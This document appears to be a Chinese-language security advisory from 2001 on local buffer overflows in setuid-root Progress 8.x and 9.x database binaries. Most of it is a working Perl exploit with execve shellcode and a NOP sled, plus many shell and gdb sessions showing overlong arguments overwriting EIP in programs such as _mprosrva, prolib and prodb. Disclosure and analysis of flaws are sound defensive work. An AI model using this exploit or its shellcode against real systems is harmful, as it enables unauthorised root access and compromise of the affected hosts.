Progress 8.x和9.x存在多个本地缓冲溢出漏洞发布时间:2001-10-09 更新时间:2001-10-09 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Progress 8 和 9详细描述 Progress中的多个程序由于对边界没有进行正确的检查而导致多个缓冲区溢出漏洞, 利用这些漏洞可以导致ROOT权利的获得。 测试代码 #!/usr/bin/perl # Progress 8 and 9 test exploit code # Proof of concept by krfinisterre@checkfree.com $len = 481; # Sufficient to overwrite the return value. $nop = "\x90"; $ret = 0xbfffe208; # Return Value / ESP / Stack Pointer. $shellcode= "\x89\xe6". "\x83\xc6\x30". "\xb8\x2e\x62\x69\x6e". "\x40". "\x89\x06". "\xb8\x2e\x73\x68\x21". "\x40". "\x89\x46\x04". "\x29\xc0". "\x88\x46\x07". "\x89\x76\x08". "\x89\x46\x0c". "\xb0\x0b". "\x87\xf3". "\x8d\x4b\x08". "\x8d\x53\x0c". "\xcd\x80"; if (@ARGV < 1) { print("Usage: $0 <offset>\n"); exit(1); } ( $offset) = @ARGV; for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { $buffer .= $nop; } $buffer .= $shellcode; $new_ret = pack('l', ($ret + $offset)); $address = sprintf('%lx', ($ret + $offset)); for ($i += length($shellcode); $i < $len; $i += 4) { $buffer .= $new_ret; } $exploit_string = "a $buffer"; system("echo -e \"$exploit_string\""); ---------------------------------------------- # gdb /usr/dlc/bin/_mpros core Core was generated by `/usr/dlc/bin/_mprosrva AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libm.so.6...done. Loaded symbols for /lib/libm.so.6 Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x42424242 in ?? () (gdb) q [root@localhost /root]# /usr/dlc/bin/_mprosrva `perl -e 'print "A" x 5746' `BBBB BBBB == 0x42424242 or my eip buffer is 1143 chars to begin overwrite eax 5746 to overwrite eip (gdb) info registers eax 0x80b3c80 134954112 ecx 0xbffff4f4 -1073744652 edx 0x480b5e31 1208704561 ebx 0x1 1 esp 0xbfffdbc0 0xbfffdbc0 ebp 0xbfffdbe0 0xbfffdbe0 esi 0x2 2 edi 0xbfffdcf4 -1073750796 eip 0x42424242 0x42424242 eflags 0x10206 66054 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x2b 43 gs 0x2b 43 fctrl 0x0 0 fstat 0x0 0 ftag 0x0 0 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0 below are Several more examples # uname -a SCO_SV scosysv 3.2 5.0.5 i386 # ls -al /usr/dlc/bin/proserve -rwxr-xr-x 1 root sys 2708 Jan 9 15:29 /usr/dlc/bin/proserve # /usr/dlc/bin/proserve `perl -e 'print "A" x 3000'` PROGRESS Version 9.1B as of Sun Dec 3 20:27:14 EST 2000 Memory fault - core dumped # ------------------ /usr/dlc/bin/_mprshut `perl -e 'print "A" x 2000'` Memory fault - core dumped ----------------------------------- /usr/dlc/bin/_mprosrv `perl -e 'print "A" x 2000'` Memory fault - core dumped ------------------- /usr/dlc/bin/_probuild a `perl -e 'print "A" x 2000'` Memory fault - core dumped -------------------- /usr/dlc/bin/prodb a `perl -e 'print "A" x 2000'` Memory fault - core dumped below this line is all version 8.3b -rwsrwxr-x 1 root root 508151 Nov 10 1999 /usr/dlc/bin/_dbutil* -rwsrwxr-x 1 root root 557075 Nov 10 1999 /usr/dlc/bin/_mprosrv* -rwsrwxr-x 1 root root 561294 Nov 10 1999 /usr/dlc/bin/_mprosrva* -rwsrwxr-x 1 root root 604635 Nov 10 1999 /usr/dlc/bin/_mprshut* -rwsrwxr-x 1 root root 2574331 Nov 10 1999 /usr/dlc/bin/_probuild* -rwsrwxr-x 1 root root 2986163 Nov 10 1999 /usr/dlc/bin/_progres* -rwsrwxr-x 1 root root 2924760 Nov 10 1999 /usr/dlc/bin/_progresa* -rwsrwxr-x 1 root root 971209 Nov 10 1999 /usr/dlc/bin/_proutil* -rwsrwxr-x 1 root root 686582 Nov 10 1999 /usr/dlc/bin/_rfutil* -rwsrwxr-x 1 root root 122260 Nov 10 1999 /usr/dlc/bin/prodb* -rwsrwxr-x 1 root root 134337 Nov 10 1999 /usr/dlc/bin/prolib* [root@localhost /root]# /usr/dlc/bin/prolib library-name `perl -e 'print "A" x 2000'` Invalid prolib command AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/prolib core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/prolib library-name AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libm.so.6...done. Loaded symbols for /lib/libm.so.6 Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 Reading symbols from /lib/libnss_files.so.2...done. Loaded symbols for /lib/libnss_files.so.2 #0 0x41414141 in ?? () --------------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/_probuild sports `perl -e 'print "A" x 1200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_probuild core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_probuild sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x400905c7 in ?? () (gdb) info register eax eax 0x41414141 1094795585 (gdb) --------------------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/_progres sports `perl -e 'print "A" x 1200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_progres core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_progres sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x400905c7 in ?? () (gdb) info register eax eax 0x41414141 1094795585 (gdb) ------------------------------------------------------------------ [root@localhost /root]# /usr/dlc/bin/_progresa sports `perl -e 'print "A" x 4200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_progresa core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_progresa sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x40090590 in ?? () (gdb) info register eax eax 0x41414141 1094795585 -------------------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/_dbutil prorest sports `perl -e 'print "A" x 4200'` ** Cannot find or open file AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)#w:) #w:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA SYSTEM ERROR: Memory violation. (49) ** Save file named core for analysis by Progress Software Corporation. (439) Quit (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_dbutil core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_dbutil prorest sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 3, Quit. Reading symbols from /lib/libm.so.6...done. Loaded symbols for /lib/libm.so.6 Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 Reading symbols from /lib/libnss_files.so.2...done. Loaded symbols for /lib/libnss_files.so.2 #0 0x400590d1 in kill () from /lib/libc.so.6 (gdb) info register edi edi 0x41414141 1094795585 ----------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/_proutil sports `perl -e 'print "A" x 4200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_proutil core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_proutil sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x40090590 in ?? () (gdb) info register eax eax 0x41414141 1094795585 ------------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/_rfutil sports `perl -e 'print "A" x 4200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_rfutil core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_rfutil sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x400905ad in ?? () (gdb) info register eax eax 0x41414141 1094795585 -------------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/prodb sports `perl -e 'print "A" x 4200'` The database name is too long. Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/prodb core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAA/.db.bi.tl.lg.lk AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. Reading symbols from /lib/libc.so.6...done. Loaded symbols for /lib/libc.so.6 Reading symbols from /lib/ld-linux.so.2...done. Loaded symbols for /lib/ld-linux.so.2 #0 0x41414141 in ?? () (gdb) info register eip eip 0x41414141 0x41414141 ----------------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/_mprosrv sports `perl -e 'print "A" x 4200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_mprosrv core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_mprosrv sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x40090590 in ?? () (gdb) info register eax eax 0x41414141 1094795585 ------------------------------------------------------------------ [root@localhost /root]# /usr/dlc/bin/_mprosrva sports `perl -e 'print "A" x 4200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_mprosrva core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_mprosrva sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x40090590 in ?? () (gdb) info register eax eax 0x41414141 1094795585 --------------------------------------------------------------- [root@localhost /root]# /usr/dlc/bin/_mprshut sports `perl -e 'print "A" x 4200'` Segmentation fault (core dumped) [root@localhost /root]# gdb /usr/dlc/bin/_mprshut core GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i586-mandrake-linux"... Core was generated by `/usr/dlc/bin/_mprshut sports AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'. Program terminated with signal 11, Segmentation fault. #0 0x40090590 in ?? () (gdb) info register eax eax 0x41414141 1094795585 (gdb) ----------------------------------------------------------------------- 解决方案 尚无 相关信息 发现者:KF (dotslash@snosoft.com) 参考资料:http://packetstormsecurity.org/0101-exploits/progress-db.txt |
